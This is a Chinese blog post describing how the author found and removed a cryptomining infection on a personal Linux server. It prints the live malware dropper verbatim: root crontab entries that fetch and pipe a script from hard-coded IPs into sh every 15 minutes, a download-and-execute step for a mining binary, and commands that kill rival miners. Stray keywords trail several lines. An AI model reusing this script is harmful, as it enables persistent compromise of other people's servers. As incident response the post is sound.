記一次 qW3xT.4，解決挖礦病毒。

時間 2019-11-11

原文原文鏈接

最近感受個人服務器特別卡，打開數據庫都半天，剛開始覺得網咯很差也沒太在乎。數據庫

利用top命令：服務器

這時候問題出來了，最高cpu佔用100%，那我用啥？？？curl

根據進程id 一看究竟，ps -ef|grep 進程id this

果斷 kill 掉這些進程，刪除qW3xT.4文件。spa

其中有一個文件比較難刪除code

lsattr -a thisxxsblog

chattr -i thisxxs 進程

這樣就能夠刪除了crontab

刪除以後kill掉qW3xT.4該進程，可是一段時間以後，發現該行程又從新啓動，確定是有守護進程，觀察top命令下的進程，發現一個可疑的進程，直接kill掉。

一段時間以後，刪除的文件從新生成，dds和挖礦的進程又從新執行。此時懷疑是否有計劃任務，此時查看計劃任務的列表

crontab -l

*/15 * * * * wget -q -O- http://216.155.135.37:8000/i.sh | sh

原來是它在做祟！刪除計劃任務 crontab -r

注意這個命令不會下載和執行sh腳本。由於我把管道符去掉了。看到的僅僅是打印的信息。大概說下這個腳本的意思：

設置環境變量，寫定時任務
查看ddgs.3013進程，若是沒有該進程，從新下載該文件，而後給它加執行權限，並執行。
批量根據關鍵字殺進程。
計劃任務刪除完成以後，這個13又開始運行。太頑固了。

因而我又看計劃任務的內容，是不是有東西沒有刪除乾淨。

[root@FantJ tmp]# curl -fsSL http://149.56.106.215:8000/i.sh
export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
 
echo "" > /var/spool/cron/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root
 
 
mkdir -p /var/spool/cron/crontabs
echo "" > /var/spool/cron/crontabs/root
echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
 
 
ps auxf | grep -v grep | grep /tmp/ddgs.3013 || rm -rf /tmp/ddgs.3013
if [ ! -f "/tmp/ddgs.3013" ]; then
    
    curl -fsSL http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -o /tmp/ddgs.3013
fi
chmod +x /tmp/ddgs.3013 && /tmp/ddgs.3013
 
ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
#ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
#ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill